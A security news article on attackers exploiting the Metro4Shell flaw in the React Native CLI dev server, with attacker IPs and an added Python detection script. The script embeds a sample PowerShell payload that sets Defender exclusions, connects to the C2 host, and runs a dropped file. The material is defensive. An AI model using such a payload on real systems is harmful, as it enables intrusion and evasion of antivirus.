Hackers Exploit Metro4Shell RCE Flaw in React Native CLI npm Package

Threat actors have been observed exploiting a critical security flaw affecting the Metro Development Server in the popular "@react-native-community/cli" npm package.

Cybersecurity company VulnCheck said it first observed exploitation of CVE-2025-11953 (aka Metro4Shell) on December 21, 2025. With a CVSS score of 9.8, the vulnerability allows remote, unauthenticated attackers to execute arbitrary operating system commands on the underlying host. Details of the flaw were first documented by JFrog in November 2025.

Despite more than a month having passed since the initial in-the-wild exploitation, the "activity has yet to see broad public acknowledgment," it added.

In the attack detected against its honeypot network, the threat actors weaponized the flaw to deliver a Base64-encoded PowerShell script that, once decoded, performs a sequence of actions, including adding Microsoft Defender Antivirus exclusions for the current working directory and the temporary folder ("C:\Users\<Username>\AppData\Local\Temp").

The PowerShell script also establishes a raw TCP connection to an attacker-controlled host and port ("8.218.43[.]248:60124"), sends a request to retrieve data, writes it to a file in the temporary directory, and executes it. The downloaded binary is written in Rust and features anti-analysis checks to hinder static inspection.
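The behaviours described above (an encoded PowerShell command line, Defender exclusions for the working and temp directories, a raw TCP callback to the listed host and port, and a drop-and-execute in the temp folder) are also what a detection engineer would hunt for. The following Python is an added example, not VulnCheck's or the article's code: it decodes a PowerShell `-EncodedCommand` argument, checks the recovered script for those behaviours, and matches connection records against the indicators quoted in the article. The log line format, the dev-server port in the sample connection records, and the specific cmdlets the payload would use (Add-MpPreference, TcpClient, Start-Process) are assumptions; the article only states what the script does, not how. The sample log lines are constructed for the example.

```python
"""Triage constructed log lines for Metro4Shell-style post-exploitation behaviour.

Added example, not code from VulnCheck or the article. Only the indicator
values (source IPs, C2 host:port) come from the article; everything else is an
assumption about log format and payload implementation.
"""
import base64
import binascii
import re
from typing import Optional

# Indicators quoted in the article, with the defanging "[.]" removed for matching.
SOURCE_IPS = {"5.109.182.231", "223.6.249.141", "134.209.69.155"}
C2_HOST, C2_PORT = "8.218.43.248", 60124

# Behaviours the article describes. The cmdlet/class names are assumptions about
# how a PowerShell payload would implement them.
BEHAVIOURS = {
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
    "raw_tcp_client": re.compile(r"Net\.Sockets\.TcpClient", re.I),
    "c2_address": re.compile(re.escape(C2_HOST) + r"\D+" + str(C2_PORT)),
    "temp_drop_exec": re.compile(
        r"\$env:TEMP.*?(Start-Process|Invoke-Item|&\s*\$)", re.I | re.S),
}

# PowerShell accepts several abbreviations of -EncodedCommand.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]+)", re.I)
# Assumed connection-log format: "... src=<ip> dst=<ip> dport=<port>".
CONN = re.compile(r"src=(\S+)\s+dst=(\S+)\s+dport=(\d+)")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (PowerShell expects UTF-16LE base64)."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # malformed or not actually a PowerShell encoded command


def classify_script(script: str) -> list:
    """Return the names of the described behaviours present in a decoded script."""
    return [name for name, rx in BEHAVIOURS.items() if rx.search(script)]


def classify_connection(line: str) -> list:
    """Match a connection record against the article's source IPs and C2 endpoint."""
    m = CONN.search(line)
    if not m:
        return []
    src, dst, dport = m.group(1), m.group(2), int(m.group(3))
    hits = []
    if src in SOURCE_IPS:
        hits.append("known_source_ip")
    if (dst, dport) == (C2_HOST, C2_PORT):
        hits.append("c2_callback")
    return hits


def scan(lines) -> list:
    """Return (line_number, [findings]) for every line that triggers something."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = classify_connection(line)
        script = decode_encoded_command(line)
        if script is not None:
            hits += ["encoded_powershell"] + classify_script(script)
        if hits:
            findings.append((n, hits))
    return findings


# Constructed sample payload mirroring the article's description (not the real one).
SAMPLE_SCRIPT = (
    "Add-MpPreference -ExclusionPath (Get-Location).Path; "
    "Add-MpPreference -ExclusionPath $env:TEMP; "
    "$c = New-Object System.Net.Sockets.TcpClient('8.218.43.248', 60124); "
    "$f = Join-Path $env:TEMP 'x.exe'; [IO.File]::WriteAllBytes($f, $b); Start-Process $f"
)
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode()

# Constructed log lines; dport=8081 is an assumed dev-server port, not from the article.
SAMPLE_LOGS = [
    "2025-12-21T03:14:07Z fw conn src=5.109.182.231 dst=10.0.0.5 dport=8081",
    f"2025-12-21T03:14:09Z proc cmd=powershell.exe -nop -w hidden -EncodedCommand {ENCODED}",
    "2025-12-21T03:14:11Z fw conn src=10.0.0.5 dst=8.218.43.248 dport=60124",
    "2025-12-21T03:20:00Z proc cmd=powershell.exe -File C:\\build\\lint.ps1",
    "2025-12-21T03:21:00Z fw conn src=10.0.0.7 dst=10.0.0.5 dport=8081",
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOGS):
        print(f"line {n}: {', '.join(hits)}")
```

Matching on the decoded script rather than the raw command line is the point: a Base64 blob defeats plain string matching, and the UTF-16LE decode is what makes the exclusion and callback patterns visible. The IP list should be treated as a snapshot from the article, not a durable signature; the behavioural patterns are the ones worth keeping.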


The attacks were found to originate from the following IP addresses:

  • 5.109.182[.]231
  • 223.6.249[.]141
  • 134.209.69[.]155

Describing the activity as neither experimental nor exploratory, VulnCheck said the delivered payloads were "consistent across multiple weeks of exploitation, indicating operational use rather than vulnerability probing or proof-of-concept testing."

"CVE-2025-11953 is not remarkable because it exists. It is remarkable because it reinforces a pattern defenders continue to relearn. Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent."
